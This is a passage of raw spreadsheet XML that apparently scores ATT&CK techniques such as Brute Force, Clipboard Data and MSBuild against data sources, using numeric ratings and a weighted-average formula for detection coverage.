        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="43" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="41" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C86" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D86" s="14">
        <v>3</v>
      </c>
      <c r="E86" s="14">
        <v>4</v>
      </c>
      <c r="F86" s="14">
        <v>5</v>
      </c>
      <c r="G86" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="43" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="41" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C87" s="45" t="s">
        <v>3050</v>
      </c>
      <c r="D87" s="14">
        <v>2</v>
      </c>
      <c r="E87" s="14">
        <v>4</v>
      </c>
      <c r="F87" s="14">
        <v>5</v>
      </c>
      <c r="G87" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="43" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="41" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:B)</f>
        <v>Account Discovery</v>
      </c>
      <c r="C88" s="45" t="s">
        <v>1159</v>
      </c>
      <c r="D88" s="14">
        <v>3</v>
      </c>
      <c r="E88" s="14">
        <v>4</v>
      </c>
      <c r="F88" s="14">
        <v>5</v>
      </c>
      <c r="G88" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="43" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="41" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C89" s="45" t="s">
        <v>3051</v>
      </c>
      <c r="D89" s="14">
        <v>2</v>
      </c>
      <c r="E89" s="14">
        <v>4</v>
      </c>
      <c r="F89" s="14">
        <v>5</v>
      </c>
      <c r="G89" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="43" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="41" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C90" s="45" t="s">
        <v>3052</v>
      </c>
      <c r="D90" s="14">
        <v>3</v>
      </c>
      <c r="E90" s="14">
        <v>4</v>
      </c>
      <c r="F90" s="14">
        <v>5</v>
      </c>
      <c r="G90" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="43" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="41" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:B)</f>
        <v>Proxy</v>
      </c>
      <c r="C91" s="45" t="s">
        <v>3053</v>
      </c>
      <c r="D91" s="14">
        <v>2</v>
      </c>
      <c r="E91" s="14">
        <v>3</v>
      </c>
      <c r="F91" s="14">
        <v>4</v>
      </c>
      <c r="G91" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="43" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="41" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:B)</f>
        <v>Replication Through Removable Media</v>
      </c>
      <c r="C92" s="45" t="s">
        <v>1203</v>
      </c>
      <c r="D92" s="14">
        <v>1</v>
      </c>
      <c r="E92" s="14">
        <v>3</v>
      </c>
      <c r="F92" s="14">
        <v>3</v>
      </c>
      <c r="G92" s="32">
        <f t="shared" si="1"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="43" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="41" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C93" s="45" t="s">
        <v>1203</v>
      </c>
      <c r="D93" s="14">
        <v>0</v>
      </c>
      <c r="E93" s="14">
        <v>2</v>
      </c>
      <c r="F93" s="14">
        <v>2</v>
      </c>
      <c r="G93" s="32">
        <f t="shared" si="1"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="43" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="41" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C94" s="45" t="s">
        <v>902</v>
      </c>
      <c r="D94" s="14">
        <v>1</v>
      </c>
      <c r="E94" s="14">
        <v>3</v>
      </c>
      <c r="F94" s="14">
        <v>4</v>
      </c>
      <c r="G94" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="43" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="41" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C95" s="45" t="s">
        <v>3054</v>
      </c>
      <c r="D95" s="14">
        <v>0</v>
      </c>
      <c r="E95" s="14">
        <v>2</v>
      </c>
      <c r="F95" s="14">
        <v>3</v>
      </c>
      <c r="G95" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="43" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="41" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C96" s="45" t="s">
        <v>1211</v>
      </c>
      <c r="D96" s="14">
        <v>0</v>
      </c>
      <c r="E96" s="14">
        <v>2</v>
      </c>
      <c r="F96" s="14">
        <v>3</v>
      </c>
      <c r="G96" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="43" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="41" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C97" s="45" t="s">
        <v>3055</v>
      </c>
      <c r="D97" s="14">
        <v>1</v>
      </c>
      <c r="E97" s="14">
        <v>3</v>
      </c>
      <c r="F97" s="14">
        <v>4</v>
      </c>
      <c r="G97" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="43" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="41" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C98" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D98" s="14">
        <v>3</v>
      </c>
      <c r="E98" s="14">
        <v>4</v>
      </c>
      <c r="F98" s="14">
        <v>5</v>
      </c>
      <c r="G98" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="43" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="41" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:B)</f>
        <v>Account Manipulation</v>
      </c>
      <c r="C99" s="45" t="s">
        <v>3056</v>
      </c>
      <c r="D99" s="14">
        <v>3</v>
      </c>
      <c r="E99" s="14">
        <v>4</v>
      </c>
      <c r="F99" s="14">
        <v>5</v>
      </c>
      <c r="G99" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="43" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="41" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C100" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D100" s="14">
        <v>2</v>
      </c>
      <c r="E100" s="14">
        <v>4</v>
      </c>
      <c r="F100" s="14">
        <v>5</v>
      </c>
      <c r="G100" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="43" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="41" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C101" s="45" t="s">
        <v>3057</v>
      </c>
      <c r="D101" s="14">
        <v>2</v>
      </c>
      <c r="E101" s="14">
        <v>4</v>
      </c>
      <c r="F101" s="14">
        <v>5</v>
      </c>
      <c r="G101" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="43" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="41" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C102" s="45" t="s">
        <v>2019</v>
      </c>
      <c r="D102" s="14">
        <v>2</v>
      </c>
      <c r="E102" s="14">
        <v>3</v>
      </c>
      <c r="F102" s="14">
        <v>4</v>
      </c>
      <c r="G102" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="43" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="41" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:B)</f>
        <v>Web Service</v>
      </c>
      <c r="C103" s="45" t="s">
        <v>1241</v>
      </c>
      <c r="D103" s="14">
        <v>3</v>
      </c>
      <c r="E103" s="14">
        <v>4</v>
      </c>
      <c r="F103" s="14">
        <v>5</v>
      </c>
      <c r="G103" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="43" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="41" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:B)</f>
        <v>One-Way Communication</v>
      </c>
      <c r="C104" s="45" t="s">
        <v>3058</v>
      </c>
      <c r="D104" s="14">
        <v>3</v>
      </c>
      <c r="E104" s="14">
        <v>4</v>
      </c>
      <c r="F104" s="14">
        <v>5</v>
      </c>
      <c r="G104" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="43" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="41" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:B)</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="C105" s="45" t="s">
        <v>1256</v>
      </c>
      <c r="D105" s="14">
        <v>0</v>
      </c>
      <c r="E105" s="14">
        <v>2</v>
      </c>
      <c r="F105" s="14">
        <v>3</v>
      </c>
      <c r="G105" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="43" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="41" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:B)</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="C106" s="45" t="s">
        <v>3059</v>
      </c>
      <c r="D106" s="14">
        <v>1</v>
      </c>
      <c r="E106" s="14">
        <v>3</v>
      </c>
      <c r="F106" s="14">
        <v>4</v>
      </c>
      <c r="G106" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="43" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="41" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C107" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D107" s="14">
        <v>1</v>
      </c>
      <c r="E107" s="14">
        <v>2</v>
      </c>
      <c r="F107" s="14">
        <v>3</v>
      </c>
      <c r="G107" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="43" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="41" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C108" s="45" t="s">
        <v>3061</v>
      </c>
      <c r="D108" s="14">
        <v>1</v>
      </c>
      <c r="E108" s="14">
        <v>3</v>
      </c>
      <c r="F108" s="14">
        <v>5</v>
      </c>
      <c r="G108" s="32">
        <f t="shared" si="1"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="43" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="41" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C109" s="45" t="s">
        <v>1268</v>
      </c>
      <c r="D109" s="14">
        <v>2</v>
      </c>
      <c r="E109" s="14">
        <v>3</v>
      </c>
      <c r="F109" s="14">
        <v>4</v>
      </c>
      <c r="G109" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="43" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="41" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C110" s="45" t="s">
        <v>3062</v>
      </c>
      <c r="D110" s="14">
        <v>0</v>
      </c>
      <c r="E110" s="14">
        <v>1</v>
      </c>
      <c r="F110" s="14">
        <v>3</v>
      </c>
      <c r="G110" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="43" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="41" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:B)</f>
        <v>Brute Force</v>
      </c>
      <c r="C111" s="45" t="s">
        <v>1275</v>
      </c>
      <c r="D111" s="14">
        <v>4</v>
      </c>
      <c r="E111" s="14">
        <v>4</v>
      </c>
      <c r="F111" s="14">
        <v>5</v>
      </c>
      <c r="G111" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="43" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="41" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:B)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
      <c r="C112" s="45" t="s">
        <v>1298</v>
      </c>
      <c r="D112" s="14">
        <v>1</v>
      </c>
      <c r="E112" s="14">
        <v>2</v>
      </c>
      <c r="F112" s="14">
        <v>3</v>
      </c>
      <c r="G112" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="43" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="41" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:B)</f>
        <v>Modify Registry</v>
      </c>
      <c r="C113" s="45" t="s">
        <v>1302</v>
      </c>
      <c r="D113" s="14">
        <v>2</v>
      </c>
      <c r="E113" s="14">
        <v>4</v>
      </c>
      <c r="F113" s="14">
        <v>5</v>
      </c>
      <c r="G113" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="43" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="41" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:B)</f>
        <v>Screen Capture</v>
      </c>
      <c r="C114" s="45" t="s">
        <v>1306</v>
      </c>
      <c r="D114" s="14">
        <v>1</v>
      </c>
      <c r="E114" s="14">
        <v>2</v>
      </c>
      <c r="F114" s="14">
        <v>3</v>
      </c>
      <c r="G114" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="43" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="41" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:B)</f>
        <v>Email Collection</v>
      </c>
      <c r="C115" s="45" t="s">
        <v>1310</v>
      </c>
      <c r="D115" s="14">
        <v>2</v>
      </c>
      <c r="E115" s="14">
        <v>4</v>
      </c>
      <c r="F115" s="14">
        <v>5</v>
      </c>
      <c r="G115" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="43" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="41" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C116" s="45" t="s">
        <v>603</v>
      </c>
      <c r="D116" s="14">
        <v>1</v>
      </c>
      <c r="E116" s="14">
        <v>1</v>
      </c>
      <c r="F116" s="14">
        <v>1</v>
      </c>
      <c r="G116" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="43" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="41" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C117" s="45" t="s">
        <v>713</v>
      </c>
      <c r="D117" s="14">
        <v>1</v>
      </c>
      <c r="E117" s="14">
        <v>3</v>
      </c>
      <c r="F117" s="14">
        <v>5</v>
      </c>
      <c r="G117" s="32">
        <f t="shared" si="1"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="43" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="41" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C118" s="45" t="s">
        <v>3063</v>
      </c>
      <c r="D118" s="14">
        <v>3</v>
      </c>
      <c r="E118" s="14">
        <v>4</v>
      </c>
      <c r="F118" s="14">
        <v>5</v>
      </c>
      <c r="G118" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="43" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="41" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C119" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D119" s="14">
        <v>2</v>
      </c>
      <c r="E119" s="14">
        <v>4</v>
      </c>
      <c r="F119" s="14">
        <v>5</v>
      </c>
      <c r="G119" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="43" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="41" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:B)</f>
        <v>Automated Collection</v>
      </c>
      <c r="C120" s="45" t="s">
        <v>1333</v>
      </c>
      <c r="D120" s="14">
        <v>1</v>
      </c>
      <c r="E120" s="14">
        <v>3</v>
      </c>
      <c r="F120" s="14">
        <v>4</v>
      </c>
      <c r="G120" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="43" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="41" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C121" s="45" t="s">
        <v>1337</v>
      </c>
      <c r="D121" s="14">
        <v>0</v>
      </c>
      <c r="E121" s="14">
        <v>0</v>
      </c>
      <c r="F121" s="14">
        <v>3</v>
      </c>
      <c r="G121" s="32">
        <f t="shared" si="1"/>
        <v>0.6</v>
      </c>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="43" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="41" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C122" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D122" s="14">
        <v>3</v>
      </c>
      <c r="E122" s="14">
        <v>5</v>
      </c>
      <c r="F122" s="14">
        <v>5</v>
      </c>
      <c r="G122" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="43" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="41" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C123" s="45" t="s">
        <v>3064</v>
      </c>
      <c r="D123" s="14">
        <v>2</v>
      </c>
      <c r="E123" s="14">
        <v>4</v>
      </c>
      <c r="F123" s="14">
        <v>5</v>
      </c>
      <c r="G123" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="43" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="41" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:B)</f>
        <v>Audio Capture</v>
      </c>
      <c r="C124" s="45" t="s">
        <v>1306</v>
      </c>
      <c r="D124" s="14">
        <v>1</v>
      </c>
      <c r="E124" s="14">
        <v>3</v>
      </c>
      <c r="F124" s="14">
        <v>4</v>
      </c>
      <c r="G124" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="43" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="41" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:B)</f>
        <v>System Time Discovery</v>
      </c>
      <c r="C125" s="45" t="s">
        <v>1344</v>
      </c>
      <c r="D125" s="14">
        <v>3</v>
      </c>
      <c r="E125" s="14">
        <v>4</v>
      </c>
      <c r="F125" s="14">
        <v>5</v>
      </c>
      <c r="G125" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="43" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="41" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C126" s="45" t="s">
        <v>1349</v>
      </c>
      <c r="D126" s="14">
        <v>1</v>
      </c>
      <c r="E126" s="14">
        <v>2</v>
      </c>
      <c r="F126" s="14">
        <v>3</v>
      </c>
      <c r="G126" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="43" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="41" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C127" s="45" t="s">
        <v>3065</v>
      </c>
      <c r="D127" s="14">
        <v>3</v>
      </c>
      <c r="E127" s="14">
        <v>4</v>
      </c>
      <c r="F127" s="14">
        <v>5</v>
      </c>
      <c r="G127" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="43" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="41" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:B)</f>
        <v>Trusted Developer Utilities Proxy Execution</v>
      </c>
      <c r="C128" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D128" s="14">
        <v>3</v>
      </c>
      <c r="E128" s="14">
        <v>4</v>
      </c>
      <c r="F128" s="14">
        <v>5</v>
      </c>
      <c r="G128" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="43" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="41" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:B)</f>
        <v>MSBuild</v>
      </c>
      <c r="C129" s="45" t="s">
        <v>3066</v>
      </c>
      <c r="D129" s="14">
        <v>2</v>
      </c>
      <c r="E129" s="14">
        <v>4</v>
      </c>
      <c r="F129" s="14">
        <v>5</v>
      </c>
      <c r="G129" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="43" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="41" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C130" s="45" t="s">
        <v>1361</v>
      </c>
      <c r="D130" s="14">
        <v>2</v>
      </c>
      <c r="E130" s="14">
        <v>4</v>
      </c>
      <c r="F130" s="14">
        <v>5</v>
      </c>
      <c r="G130" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="43" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="41" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C131" s="45" t="s">
        <v>2173</v>
      </c>
      <c r="D131" s="14">
        <v>3</v>
      </c>
      <c r="E131" s="14">
        <v>5</v>
      </c>
      <c r="F131" s="14">
        <v>5</v>
      </c>
      <c r="G131" s="32">
        <f t="shared" ref="G131:G194" si="2">((D131*2)+(E131*2)+F131)/5</f>
        <v>4.2</v>
      </c>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="43" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="41" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C132" s="45" t="s">
        <v>2019</v>
      </c>
      <c r="D132" s="14">
        <v>2</v>
      </c>
      <c r="E132" s="14">
        <v>4</v>
      </c>
      <c r="F132" s="14">
        <v>5</v>
      </c>
      <c r="G132" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="43" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="41" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:B)</f>
        <v>Data Encoding</v>
      </c>
      <c r="C133" s="45" t="s">
        <v>534</v>
      </c>
      <c r="D133" s="14">
        <v>2</v>
      </c>
      <c r="E133" s="14">
        <v>4</v>
      </c>
      <c r="F133" s="14">
        <v>5</v>
      </c>
      <c r="G133" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="43" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="41" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:B)</f>
        <v>External Remote Services</v>
      </c>
      <c r="C134" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D134" s="14">
        <v>3</v>
      </c>
      <c r="E134" s="14">
        <v>4</v>
      </c>
      <c r="F134" s="14">
        <v>5</v>
      </c>
      <c r="G134" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="43" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="41" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:B)</f>
        <v>Access Token Manipulation</v>
      </c>
      <c r="C135" s="45" t="s">
        <v>3067</v>
      </c>
      <c r="D135" s="14">
        <v>2</v>
      </c>
      <c r="E135" s="14">
        <v>4</v>
      </c>
      <c r="F135" s="14">
        <v>5</v>
      </c>
      <c r="G135" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="43" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="41" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:B)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="C136" s="45" t="s">
        <v>1407</v>
      </c>
      <c r="D136" s="14">
        <v>3</v>
      </c>
      <c r="E136" s="14">
        <v>4</v>
      </c>
      <c r="F136" s="14">
        <v>5</v>
      </c>
      <c r="G136" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
